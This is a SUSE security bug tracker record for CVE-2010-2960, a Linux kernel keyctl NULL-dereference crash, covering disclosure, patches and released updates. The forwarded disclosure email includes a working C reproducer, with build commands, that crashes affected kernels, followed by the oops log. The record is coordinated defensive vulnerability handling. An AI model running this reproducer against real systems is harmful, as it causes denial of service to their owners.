634637 – (CVE-2010-2960) VUL-1: CVE-2010-2960: kernel: keyctl_session_to_parent NULL deref system crash

Bug 634637 (CVE-2010-2960) - VUL-1: CVE-2010-2960: kernel: keyctl_session_to_parent NULL deref system crash

Summary: VUL-1: CVE-2010-2960: kernel: keyctl_session_to_parent NULL deref system crash

Status:	RESOLVED FIXED

Alias:	CVE-2010-2960

Product:	SUSE Security Incidents
Classification:	Novell Products
Component:	General (show other bugs)
Version:	unspecified
Hardware:	Other Other

Priority:	P5 - None Severity: Major
Target Milestone:	---
Deadline:	2010-09-10
Assignee:	Security Team bot
QA Contact:	Security Team bot

URL:
Whiteboard:	maint:released:11.3:35928 maint:relea...
Keywords:

Depends on:
Blocks:

Clone This Bug

Reported:	2010-08-26 07:20 UTC by Thomas Biege
Modified:	2017-03-20 21:23 UTC (History)
CC List:	2 users (show)

See Also:
Found By:	Development
Services Priority:
Business Priority:
Blocker:	---
Marketing QA Status:	---
IT Deployment:	---

Attachments
07-keys-rcu-warning-fix.diff (1.99 KB, patch) 2010-08-27 09:39 UTC, Thomas Biege	Details \| Diff
08-keys-fix-keyctl_session_to_parent.diff (1.82 KB, patch) 2010-08-27 09:40 UTC, Thomas Biege	Details \| Diff
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Thomas Biege 2010-08-26 07:20:13 UTC

Hi.
There is a security bug in package 'kernel'.

This bug is NOT PUBLIC.

The coordinated release date (CRD) is: 2010-09-10

CVE number: CVE-2010-2960
CVE description: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2960

Original posting:


----------  Weitergeleitete Nachricht  ----------

Betreff: [security@suse.de] keyctl_session_to_parent NULL deref system crash
Datum: Donnerstag 26 August 2010
Von: Kees Cook <kees@ubuntu.com>
An: security@kernel.org, David Howells <dhowells@redhat.com>

Hello,

This issue was discovered by Tavis Ormandy. Please keep the reproducer
private. I've assigned it as CVE-2010-2960. I would like to set a
coordinated release date of Sep 10th, if possible.

Without taking a close look, I assume this is triggered by the following
line in keyctl_session_to_parent:

cred->tgcred->session_keyring = key_ref_to_ptr(keyring_r);

But I haven't verified.

Thanks,

-Kees


#include <unistd.h>
#include <keyutils.h>

//
// Tavis Ormandy, August 2010. taviso@cmpxchg8b.com
//
// $ apt-get install libkeyutils-dev
// $ gcc keyctl.c -o keyctl -lkeyutils
// $ ./keyctl
//

#ifndef KEYCTL_SESSION_TO_PARENT
# define KEYCTL_SESSION_TO_PARENT 18
#endif

int main(int argc, char **argv)
{
    keyctl(KEYCTL_SESSION_TO_PARENT);
}


$ gcc keyctl.c -o keyctl -lkeyutils
$ ./keyctl
[  213.999221] BUG: unable to handle kernel NULL pointer dereference at 
00000034
[  214.002770] IP: [<c02f0f2a>] keyctl_session_to_parent+0x12a/0x1c0
[  214.006011] *pde = 0fdb0067 *pte = 00000000 
[  214.008007] Oops: 0000 [#1] SMP 
[  214.008973] last sysfs file: /sys/module/ppdev/initstate
[  214.010466] Modules linked in: binfmt_misc vmblock vsock vmmemctl vmhgfs 
acpiphp snd_ens1371 gameport snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss 
snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event 
snd_seq snd_timer snd_seq_device ppdev fbcon tileblit font bitblit softcursor 
snd psmouse serio_raw parport_pc soundcore snd_page_alloc vmci shpchp 
i2c_piix4 vga16fb vgastate intel_agp agpgart lp parport mptspi mptscsih 
mptbase floppy scsi_transport_spi vmxnet
[  214.024416] 
[  214.024899] Pid: 1772, comm: a.out Not tainted (2.6.32-24-generic #41-
Ubuntu) VMware Virtual Platform
[  214.027413] EIP: 0060:[<c02f0f2a>] EFLAGS: 00210046 CPU: 0
[  214.028927] EIP is at keyctl_session_to_parent+0x12a/0x1c0
[  214.030419] EAX: d2cde100 EBX: d2cdeb00 ECX: 000003e8 EDX: cfcfc480
[  214.032132] ESI: cfddb300 EDI: 00000000 EBP: d2c33f94 ESP: d2c33f7c
[  214.033811]  DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068
[  214.035292] Process a.out (pid: 1772, ti=d2c32000 task=d79bbfc0 
task.ti=d2c32000)
[  214.037346] Stack:
[  214.037926]  00000000 000003e8 d2cde700 004370c0 00000012 08048520 d2c33fac 
c02f22e5
[  214.040262] <0> 00000004 00000012 00327ff4 08048520 d2c32000 c01033ec 
00000012 004370c0
[  214.042795] <0> 0804852b 00327ff4 08048520 00000001 00000120 0000007b 
0000007b 00000000
[  214.045405] Call Trace:
[  214.046108]  [<c02f22e5>] ? sys_keyctl+0x65/0x170
[  214.047434]  [<c01033ec>] ? syscall_call+0x7/0xb
[  214.048711] Code: 90 0f 85 77 ff ff ff 8b 7a 08 89 7d ec 3b 78 18 0f 85 68 
ff ff ff 3b 7a 18 0f 85 5f ff ff ff 3b 7a 10 0f 85 56 ff ff ff 8b 7d e8 <3b> 
4f 34 8d 76 00 0f 85 47 ff ff ff 8b 7d f0 3b 4f 34 0f 85 3b 
[  214.056401] EIP: [<c02f0f2a>] keyctl_session_to_parent+0x12a/0x1c0 SS:ESP 
0068:d2c33f7c
[  214.058676] CR2: 0000000000000034
[  214.059605] ---[ end trace cc41d96061101854 ]---

-- 
Kees Cook
Ubuntu Security Team

-------------------------------------------------------------
[security@suse.de] Re: keyctl_session_to_parent NULL deref system crash
 Von: "Michael K. Johnson" <johnsonm@rpath.com>
 An: Kees Cook <kees@ubuntu.com>
 Kopie: David Howells <dhowells@redhat.com>, security@kernel.org, 
security@mandriva.com, security@suse.de, security@owl.openwall.com, 
secalert@redhat.com, security@rpath.com, Tavis Ormandy <taviso@cmpxchg8b.com>, 
security@debian.org, security@ubuntu.com
 
Thanks for the notice.  I'm not seeing an oops on rPath Linux or
Foresight Linux kernels.  I'm presuming that this is due to
CONFIG_SECURITY_DEFAULT_MMAP_MIN_ADDR=65536
as has been the case for a some other NULL deref issues.

I had vaguely expected a segfault instead of an oops, but did
not see one -- strace says
keyctl(0x12, 0x7fff016e9e68, 0x7fff016e9e78, 0x400600, 0x7fa5ece63270) = 0
and I didn't look any further.  Perhaps there's some handling in the
version of keyutils we're using (1.2) that is hiding the bug?  (But even
then I'd suspect that mmap_min_addr would protect against the oops.)

-------------------------------------------------------------
[security@suse.de] Re: keyctl_session_to_parent NULL deref system crash
 Von: Tavis Ormandy <taviso@cmpxchg8b.com>
 An: "Michael K. Johnson" <johnsonm@rpath.com>
 Kopie: David Howells <dhowells@redhat.com>, security@kernel.org, Kees Cook 
<kees@ubuntu.com>, security@suse.de, security@owl.openwall.com, 
secalert@redhat.com, security@debian.org, security@mandriva.com, 
security@rpath.com, security@ubuntu.com
 
On Wed, Aug 25, 2010 at 09:44:56PM -0400, Michael K. Johnson wrote:
> Thanks for the notice.  I'm not seeing an oops on rPath Linux or
> Foresight Linux kernels.  I'm presuming that this is due to
> CONFIG_SECURITY_DEFAULT_MMAP_MIN_ADDR=65536
> as has been the case for a some other NULL deref issues.
> 
> I had vaguely expected a segfault instead of an oops, but did
> not see one -- strace says
> keyctl(0x12, 0x7fff016e9e68, 0x7fff016e9e78, 0x400600, 0x7fa5ece63270) = 0
> and I didn't look any further.  Perhaps there's some handling in the
> version of keyutils we're using (1.2) that is hiding the bug?  (But even
> then I'd suspect that mmap_min_addr would protect against the oops.)

Hey Michael, I think is just strace not understanding how to decipher
the parameters, keyctl() can take up to 5 parameters, but they aren't
used with this specific command.

mmap_min_addr won't help (ubuntu are also using it by default), I think
there was just a narrow window where this codepath was reachable in the
kernel, and ubuntu got unlucky.

(I've been away from linux kernel security for a few months, I don't
know if people consider mmap_min_addr an acceptable mitigation against
NULL derefs now...I imagine this one is exploitable with it turned
off..I'll let you guys decide).

Tavis.

-- 
-------------------------------------
taviso@cmpxchg8b.com | pgp encrypted mail preferred
-------------------------------------------------------

Comment 3 Thomas Biege 2010-08-27 09:39:32 UTC

Created attachment 385856 [details]
07-keys-rcu-warning-fix.diff

Fix a missing RCU read lock

Comment 4 Thomas Biege 2010-08-27 09:40:22 UTC

Created attachment 385857 [details]
08-keys-fix-keyctl_session_to_parent.diff

Fix a permissions check that should be conditional

Comment 7 Ludwig Nussel 2010-08-27 14:24:44 UTC

system lock up is reproducible on sled11

Comment 8 Ludwig Nussel 2010-09-02 07:10:13 UTC

public and also a candidate for upcoming sle11sp1 kernel update

Comment 9 Jeff Mahoney 2010-09-16 21:10:45 UTC

This issue was introduced in 2.6.32.

Fix applied to SLE11 SP1.
Fix applied to openSUSE 11.3.
The fix is upstream as of 2.6.36-rc4.

SLERT and Moblin/Meego may be affected.

Comment 10 Mike Galbraith 2010-09-17 10:39:21 UTC

Applied to SLE11-RT-SP1.

Comment 11 Swamp Workflow Management 2010-09-22 16:10:17 UTC

Update released for: kernel-debug, kernel-debug-base, kernel-debug-base-debuginfo, kernel-debug-debuginfo, kernel-debug-debugsource, kernel-debug-devel, kernel-debug-devel-debuginfo, kernel-default, kernel-default-base, kernel-default-base-debuginfo, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-devel, kernel-default-devel-debuginfo, kernel-desktop, kernel-desktop-base, kernel-desktop-base-debuginfo, kernel-desktop-debuginfo, kernel-desktop-debugsource, kernel-desktop-devel, kernel-desktop-devel-debuginfo, kernel-devel, kernel-ec2, kernel-ec2-base, kernel-ec2-base-debuginfo, kernel-ec2-debuginfo, kernel-ec2-debugsource, kernel-ec2-devel, kernel-ec2-devel-debuginfo, kernel-ec2-extra, kernel-ec2-extra-debuginfo, kernel-pae, kernel-pae-base, kernel-pae-base-debuginfo, kernel-pae-debuginfo, kernel-pae-debugsource, kernel-pae-devel, kernel-pae-devel-debuginfo, kernel-source, kernel-source-vanilla, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-base-debuginfo, kernel-trace-debuginfo, kernel-trace-debugsource, kernel-trace-devel, kernel-trace-devel-debuginfo, kernel-vanilla, kernel-vanilla-base, kernel-vanilla-base-debuginfo, kernel-vanilla-debuginfo, kernel-vanilla-debugsource, kernel-vanilla-devel, kernel-vanilla-devel-debuginfo, kernel-vmi, kernel-vmi-base, kernel-vmi-base-debuginfo, kernel-vmi-debuginfo, kernel-vmi-debugsource, kernel-vmi-devel, kernel-vmi-devel-debuginfo, kernel-xen, kernel-xen-base, kernel-xen-base-debuginfo, kernel-xen-debuginfo, kernel-xen-debugsource, kernel-xen-devel, kernel-xen-devel-debuginfo, preload-kmp-default, preload-kmp-desktop
Products:
openSUSE 11.3 (debug, i586, x86_64)

Comment 12 Swamp Workflow Management 2010-10-13 15:08:31 UTC

Update released for: btrfs-kmp-default, btrfs-kmp-xen, cluster-network-kmp-default, cluster-network-kmp-xen, ext4dev-kmp-default, ext4dev-kmp-xen, gfs2-kmp-default, gfs2-kmp-xen, hyper-v-kmp-default, kernel-default, kernel-default-base, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-devel, kernel-default-devel-debuginfo, kernel-default-extra, kernel-desktop-devel, kernel-ec2, kernel-ec2-base, kernel-ec2-debuginfo, kernel-ec2-debugsource, kernel-ec2-devel, kernel-ec2-devel-debuginfo, kernel-ec2-extra, kernel-source, kernel-source-debuginfo, kernel-source-vanilla, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-debuginfo, kernel-trace-debugsource, kernel-trace-devel, kernel-trace-devel-debuginfo, kernel-trace-extra, kernel-xen, kernel-xen-base, kernel-xen-debuginfo, kernel-xen-debugsource, kernel-xen-devel, kernel-xen-devel-debuginfo, kernel-xen-extra
Products:
SLE-DEBUGINFO 11-SP1 (x86_64)
SLE-DESKTOP 11-SP1 (x86_64)
SLE-HAE 11-SP1 (x86_64)
SLE-SERVER 11-SP1 (x86_64)
SLES4VMWARE 11-SP1 (x86_64)

Comment 13 Swamp Workflow Management 2010-10-13 15:16:22 UTC

Update released for: btrfs-kmp-default, cluster-network-kmp-default, ext4dev-kmp-default, gfs2-kmp-default, kernel-default, kernel-default-base, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-devel, kernel-default-devel-debuginfo, kernel-default-extra, kernel-default-man, kernel-source, kernel-source-debuginfo, kernel-source-vanilla, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-debuginfo, kernel-trace-debugsource, kernel-trace-devel, kernel-trace-devel-debuginfo, kernel-trace-extra, kernel-trace-man
Products:
SLE-DEBUGINFO 11-SP1 (s390x)
SLE-HAE 11-SP1 (s390x)
SLE-SERVER 11-SP1 (s390x)

Comment 14 Swamp Workflow Management 2010-10-13 15:22:14 UTC

Update released for: btrfs-kmp-default, btrfs-kmp-pae, btrfs-kmp-xen, cluster-network-kmp-default, cluster-network-kmp-pae, cluster-network-kmp-xen, ext4dev-kmp-default, ext4dev-kmp-pae, ext4dev-kmp-xen, gfs2-kmp-default, gfs2-kmp-pae, gfs2-kmp-xen, hyper-v-kmp-default, hyper-v-kmp-pae, kernel-default, kernel-default-base, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-devel, kernel-default-extra, kernel-desktop-devel, kernel-ec2, kernel-ec2-base, kernel-ec2-devel, kernel-ec2-extra, kernel-pae, kernel-pae-base, kernel-pae-debuginfo, kernel-pae-debugsource, kernel-pae-devel, kernel-pae-extra, kernel-source, kernel-source-debuginfo, kernel-source-vanilla, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-devel, kernel-trace-extra, kernel-xen, kernel-xen-base, kernel-xen-debuginfo, kernel-xen-debugsource, kernel-xen-devel, kernel-xen-extra
Products:
SLE-DEBUGINFO 11-SP1 (i386)
SLE-DESKTOP 11-SP1 (i386)
SLE-HAE 11-SP1 (i386)
SLE-SERVER 11-SP1 (i386)
SLES4VMWARE 11-SP1 (i386)

Comment 15 Swamp Workflow Management 2010-10-13 15:34:18 UTC

Update released for: btrfs-kmp-default, cluster-network-kmp-default, ext4dev-kmp-default, gfs2-kmp-default, kernel-default, kernel-default-base, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-devel, kernel-default-devel-debuginfo, kernel-default-extra, kernel-source, kernel-source-debuginfo, kernel-source-vanilla, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-debuginfo, kernel-trace-debugsource, kernel-trace-devel, kernel-trace-devel-debuginfo, kernel-trace-extra
Products:
SLE-DEBUGINFO 11-SP1 (ia64)
SLE-HAE 11-SP1 (ia64)
SLE-SERVER 11-SP1 (ia64)

Comment 16 Marcus Meissner 2010-10-13 15:54:46 UTC

We have just released a kernel update for SUSE Linux Enterprise 11 SP1 that mentions/fixes this bug. The released version is 2.6.32.23-0.3.1.

all done

Comment 17 Swamp Workflow Management 2010-10-13 16:09:14 UTC

Update released for: kernel-default-extra, kernel-xen-extra
Products:
SLE-SERVER 11-EXTRA (x86_64)

Comment 18 Swamp Workflow Management 2010-10-13 16:11:38 UTC

Update released for: kernel-default-extra, kernel-pae-extra, kernel-xen-extra
Products:
SLE-SERVER 11-EXTRA (i386)

Comment 19 Swamp Workflow Management 2010-10-13 16:14:01 UTC

Update released for: kernel-default-extra
Products:
SLE-SERVER 11-EXTRA (ia64)

Comment 20 Swamp Workflow Management 2010-10-13 16:16:25 UTC

Update released for: kernel-default-extra, kernel-ppc64-extra
Products:
SLE-SERVER 11-EXTRA (ppc64)

Comment 21 Swamp Workflow Management 2010-10-13 16:18:47 UTC

Update released for: kernel-default-extra
Products:
SLE-SERVER 11-EXTRA (s390x)

Comment 22 Swamp Workflow Management 2010-10-14 11:54:26 UTC

Update released for: btrfs-kmp-default, btrfs-kmp-ppc64, cluster-network-kmp-default, cluster-network-kmp-ppc64, ext4dev-kmp-default, ext4dev-kmp-ppc64, gfs2-kmp-default, gfs2-kmp-ppc64, kernel-default, kernel-default-base, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-devel, kernel-default-extra, kernel-kdump, kernel-kdump-debuginfo, kernel-kdump-debugsource, kernel-ppc64, kernel-ppc64-base, kernel-ppc64-debuginfo, kernel-ppc64-debugsource, kernel-ppc64-devel, kernel-ppc64-extra, kernel-source, kernel-source-debuginfo, kernel-source-vanilla, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-debuginfo, kernel-trace-debugsource, kernel-trace-devel, kernel-trace-extra
Products:
SLE-DEBUGINFO 11-SP1 (ppc64)
SLE-HAE 11-SP1 (ppc64)
SLE-SERVER 11-SP1 (ppc64)

Comment 23 Swamp Workflow Management 2011-02-07 11:50:49 UTC

Update released for: brocade-bna-kmp-rt, iscsitarget-kmp-rt, kernel-rt, kernel-rt-base, kernel-rt-debuginfo, kernel-rt-debugsource, kernel-rt-devel, kernel-rt-devel-debuginfo, kernel-rt-extra, kernel-rt_trace, kernel-rt_trace-base, kernel-rt_trace-debuginfo, kernel-rt_trace-debugsource, kernel-rt_trace-devel, kernel-rt_trace-devel-debuginfo, kernel-rt_trace-extra, kernel-source-rt, kernel-source-rt-debuginfo, kernel-syms-rt, ofed-kmp-rt
Products:
SLE-RT 11-SP1 (x86_64)

Comment 24 Swamp Workflow Management 2013-06-10 11:35:08 UTC

openSUSE-SU-2013:0927-1: An update that solves 75 vulnerabilities and has 1406 fixes is now available.

Category: security (low)
Bug References: 176921,225091,299267,436025,439348,445872,458027,467688,468397,470671,476525,486001,501563,503038,527028,550447,550906,552250,556135,556234,556572,556959,557479,557710,560420,560454,561811,562046,562095,563905,564618,564635,564638,564640,565027,565124,565845,566332,566768,567283,567376,567474,567703,568147,568848,569050,569194,569238,569606,569687,569916,570284,570320,570492,570526,572119,572294,572661,572834,573237,573330,573401,573565,573722,573803,574006,574771,575047,575072,575073,575074,575181,575194,575199,575396,575409,575752,575884,575923,575956,576277,577203,577232,577355,577358,577529,577753,577771,577856,577937,577967,578046,578059,578429,578430,578572,578639,578927,578980,578981,579060,579111,579137,579439,579636,579639,579647,579682,580105,580140,580373,580381,580416,580793,580799,580823,580991,581057,581103,581188,581199,581567,581718,581940,582552,582643,582730,582872,582878,583022,583296,583356,583539,583677,583900,584197,584209,584218,584320,584343,584451,584453,584475,584508,584574,584617,584691,584728,584820,584875,584958,585034,585124,585179,585191,585241,585269,58529,585296,585385,585463,585490,585492,585608,585711,585743,586343,586364,586417,586684,586806,587073,587114,587125,587199,587427,587562,587669,587673,587681,587692,587739,587746,587782,588008,588929,588972,588994,589280,589449,589650,589651,589652,589654,589655,589656,589657,589660,589679,589804,589906,590154,590217,590401,590415,590585,590687,590705,590727,590856,590859,590926,590927,590937,590980,590995,590996,591039,591293,591318,591376,591377,591401,591473,591513,591556,591870,591950,592176,592472,592703,592943,593318,593319,593731,593934,594066,594131,594271,594305,594367,594391,594399,594473,594583,594586,594835,594997,595074,595215,595609,595755,595960,596031,596113,596460,596462,596646,596720,596783,596943,597120,597135,597583,597648,597650,598246,598253,598270,598308,598493,598553,598677,598837,599279,599671,599814,599955,600043,600256,600261,600364,600375,600516,600535,600579,600983,601168,601198,602150,602208,602232,602514,602838,602852,602969,602980,603148,603205,603387,603411,603464,603510,603528,603738,604183,605001,605321,605686,605947,606575,606743,606778,606797,606977,607123,607339,607448,607628,607890,608435,608478,609172,609196,609281,609506,610783,611094,611104,611760,612009,612407,612729,613171,613330,613542,613906,614226,614332,614349,614793,615003,615557,615630,616080,616088,616369,616464,616612,617248,617437,617464,618059,618072,618379,618424,618444,618767,619002,619007,619525,619536,619840,620020,620021,620443,620654,620904,620929,621203,621598,621715,622597,622635,622727,622868,623307,624020,624072,624340,624436,624814,624850,625167,625666,625674,626321,626880,627060,627386,627518,628180,628554,628604,629170,629263,629552,630068,630121,630132,630970,631075,631801,632317,632568,632974,632975,633026,633268,633543,633581,633585,633593,633733,634637,635425,635515,636435,636461,636561,636672,636850,637436,637502,637542,637639,637944,638258,638274,638277,638400,638613,638618,638807,638860,639161,639197,639728,639803,639944,640276,640278,640850,640878,641247,642009,642309,642313,642314,642449,642486,643173,643249,643266,643477,643513,643909,643914,643922,644219,644350,644373,644630,645659,645893,646045,646226,646542,646702,647392,647497,647567,647775,648112,648308,648647,648701,648916,649000,649187,649231,649257,649355,649473,649548,649820,650067,650109,650111,650113,650116,650185,650309,650366,650487,650545,650748,650897,651152,651218,651596,651599,651626,652024,652293,652391,652563,652603,652842,652939,652940,652945,653148,653258,653266,653800,653850,653930,654150,654169,654350,654501,654530,654581,654701,654837,654967,655027,655220,655278,655434,655964,655973,656219,656471,656587,657248,657324,657350,657412,657415,657763,658037,658254,658337,658353,658413,658461,658464,658551,658829,659101,659144,659394,659419,660507,660546,661605,662031,662202,662212,662335,662340,662360,662432,662673,662722,662800,662931,663313,663513,663537,663582,663678,663706,664149,664463,665480,665499,665524,665663,666012,666836,666842,666893,667226,667766,668483,668545,668633,668872,668895,668896,668898,668927,669058,669571,669740,670129,670154,670465,670615,670816,670864,670868,670979,671256,671274,671296,671479,671483,671943,672292,672453,672492,672923,673516,674189,674549,675115,675127,675963,676419,676890,677286,677391,677398,677563,677783,678531,678728,679301,679812,680809,680814,680845,681242,682076,682251,682319,682333,682482,682755,682940,682941,683107,683282,683569,684085,684297,684472,684852,684927,685226,685276,686325,686404,686702,686813,686921,686980,687046,687049,687065,687068,687478,687759,687760,687789,688326,688912,688996,689227,689230,689290,689435,689436,689596,689746,690073,690082,690611,690683,691216,691269,691408,691536,691538,691632,691633,691693,691714,691742,691829,691979,692343,692454,692459,692460,692709,693149,693513,693636,694963,694966,695066,695067,695243,695605,695898,696107,696586,697255,697777,697783,697913,697942,697944,698050,698053,698102,698269,698272,698524,698540,698548,698572,698604,698774,698776,698779,698793,698797,698801,698803,698949,699085,699087,699089,699092,699265,699354,699495,699534,699687,699701,699703,699842,699916,699946,699950,699990,700009,700080,700084,7000995,700332,700391,700401,700445,700448,700512,700514,700632,700637,700638,700777,700856,701163,701170,701183,701198,701622,701686,701977,702133,702384,702470,702604,702651,702736,702832,702838,703013,703100,703156,703204,703422,703426,703653,703786,704163,704280,704361,704592,704917,704957,705433,705472,705487,705551,705906,705962,706131,706410,706472,706473,706485,706557,706587,706696,706821,706838,706841,706882,706913,707094,707270,707389,707666,707988,708160,708204,708269,708274,708296,708376,708635,708636,708720,708730,708809,708836,709063,709064,709068,709075,709266,709269,709300,709332,709467,709528,709866,709974,710352,710790,710868,710969,711201,711285,711297,711378,711519,711566,711592,711684,711765,712404,712405,712420,712899,713134,713148,713448,713490,713675,713707,714096,714106,714215,714274,714552,714604,714605,714643,714786,714789,714911,715031,715496,715635,716023,716708,716850,716970,716971,717142,717160,717248,717263,717372,717500,717573,717574,717797,717840,717848,717884,717996,718149,718160,718165,718265,718279,718366,718401,718518,718521,718551,718831,718863,718910,718918,718936,718950,719029,719079,719090,719280,719296,719408,719592,719645,719693,719846,719911,719943,720075,720353,720451,720456,720457,720458,720459,720460,720536,720661,720674,720741,720750,720753,720946,720960,720996,721007,721042,721045,721206,721212,721239,721246,721337,721410,721464,721517,721587,721738,721840,721857,721874,722092,722260,722265,722414,722433,722437,722449,722560,722569,722635,722640,722646,722793,722795,722993,723008,723171,723597,723884,724014,724133,724227,724544,724577,724616,724620,724734,724800,724865,724906,725077,725208,725344,725346,725350,725355,725424,725592,725594,725709,725836,725878,726023,726075,726156,726176,726214,726309,726333,726400,726504,726699,726703,726710,726850,726999,727250,727324,727367,727415,727453,727493,727611,727638,727650,727793,727814,728035,728043,728086,728195,728329,728597,728626,729122,729466,729518,729548,7297470,729789,729840,729854,730103,730117,730265,730440,730660,730731,730749,731009,731029,731035,731261,731387,73149,731701,731739,731770,731809,731945,731999,732070,732082,732132,732178,732296,732335,732371,732471,732535,732582,733236,733248,733270,733390,733435,733543,733702,733761,733822,733863,734213,734522,734526,734771,734900,735216,735277,735369,735417,735543,735765,735800,735909,736018,736079,736182,736255,736257,736669,736743,736896,737328,737574,737833,737969,738056,738117,738210,738284,738400,738421,738528,738567,738583,738597,738679,738742,739020,739111,739356,739381,739728,739837,739856,740180,740281,740291,740347,740780,740866,740898,740969,740997,741117,741191,741478,741814,741824,741863,742181,742210,742279,742353,742570,742845,742871,743212,743232,743518,743579,743735,743978,744198,744206,744253,744314,744315,744392,744400,744404,744652,744655,744692,744758,744795,744963,745088,745400,745422,745424,745741,745867,745876,745929,746373,746454,746509,746526,746579,746717,746938,747071,747159,747404,747867,747878,747944,748112,748384,748456,748463,748629,748632,748806,748827,748854,748862,748896,749049,749115,749417,749543,749651,749787,749980,750041,750173,750402,750426,750459,750995,751015,751171,751322,751550,751743,751885,751903,751916,752022,752067,752352,752408,752484,752544,752599,752634,752972,753172,753353,753617,753698,754052,754085,754391,754428,754670,754690,754898,754969,755178,755537,755620,755758,755812,756050,756236,756276,756585,756821,756940,757059,757077,757202,757205,757289,757315,757373,757517,757565,757719,757783,757789,757950,758104,758279,758532,758540,758703,758731,758833,759336,759340,759539,759541,759657,759805,759908,759971,760015,760237,760279,760346,760806,760833,760974,761087,761158,761245,761387,761772,761774,761775,762099,762158,762214,762259,762285,762329,762366,762414,762424,762693,762991,762992,763026,763198,763267,763307,763463,763485,763628,763654,763717,763754,763858,763954,763968,764091,764150,764209,764339,764500,764717,764900,765253,765524,766027,766445,766654,766733,767281,767469,767610,767684,767983,768052,768084,768470,768504,768632,769035,769195,769251,769407,769685,770034,770238,770269,770695,770763,771102,771242,771361,771398,771428,771706,771778,772407,772420,772427,772454,772473,772483,772566,772786,772831,772893,773006,773007,773251,773267,773319,773320,773383,773406,773487,773606,773688,773699,773831,773878,774073,774289,774500,774523,774612,774859,774902,774964,774973,775182,775373,775394,775685,775984,776019,776044,776081,776095,776127,776144,776787,776896,777024,777269,777283,778082,778136,778334,778630,778822,779294,779330,779461,779462,779577,779699,779750,779969,780008,780012,780216,780461,780876,781018,781327,781484,781574,782369,782721,783965,784192,784334,784576,785100,785496,785554,785851,786976,787168,787202,787348,787821,787848,788277,788452,789010,789115,789235,789648,789703,789836,789993,790457,790498,790920,790935,791498,791853,791904,792270,792500,792656,792834,793104,793139,793593,793671,794231,794824,795354,797042,798960,799209,799275,799909,803056,804154
CVE References: CVE-2009-4537,CVE-2010-0415,CVE-2010-0622,CVE-2010-0623,CVE-2010-1173,CVE-2010-1437,CVE-2010-2798,CVE-2010-2803,CVE-2010-2943,CVE-2010-2946,CVE-2010-2959,CVE-2010-2960,CVE-2010-2962,CVE-2010-2963,CVE-2010-3015,CVE-2010-3078,CVE-2010-3079,CVE-2010-3080,CVE-2010-3084,CVE-2010-3437,CVE-2010-3699,CVE-2010-3705,CVE-2010-3861,CVE-2010-3874,CVE-2010-3875,CVE-2010-3876,CVE-2010-3877,CVE-2010-3880,CVE-2010-3881,CVE-2010-4072,CVE-2010-4073,CVE-2010-4075,CVE-2010-4076,CVE-2010-4077,CVE-2010-4082,CVE-2010-4083,CVE-2010-4157,CVE-2010-4158,CVE-2010-4160,CVE-2010-4162,CVE-2010-4163,CVE-2010-4165,CVE-2010-4169,CVE-2010-4175,CVE-2010-4243,CVE-2010-4251,CVE-2010-4258,CVE-2010-4342,CVE-2010-4529,CVE-2010-4656,CVE-2010-4668,CVE-2011-0521,CVE-2011-0710,CVE-2011-1573,CVE-2011-1593,CVE-2011-2479,CVE-2011-2494,CVE-2011-4097,CVE-2011-4127,CVE-2011-4131,CVE-2011-4622,CVE-2012-0045,CVE-2012-0056,CVE-2012-1179,CVE-2012-1601,CVE-2012-2133,CVE-2012-2372,CVE-2012-2373,CVE-2012-2390,CVE-2012-2745,CVE-2012-3412,CVE-2012-3430,CVE-2012-4461,CVE-2012-5517,CVE-2013-0871
Sources used:
openSUSE 11.4 (src):    drbd-8.3.11-10.1, iscsitarget-1.4.19-14.3, kernel-docs-3.0.58-30.3, kernel-source-3.0.58-30.1, kernel-syms-3.0.58-30.1, ndiswrapper-1.57rc1-16.2, omnibook-20100406-9.2, open-vm-tools-2012.8.8.1-37.2, preload-1.2-6.25.2, systemtap-1.4-1.5.1, virtualbox-4.0.12-0.54.2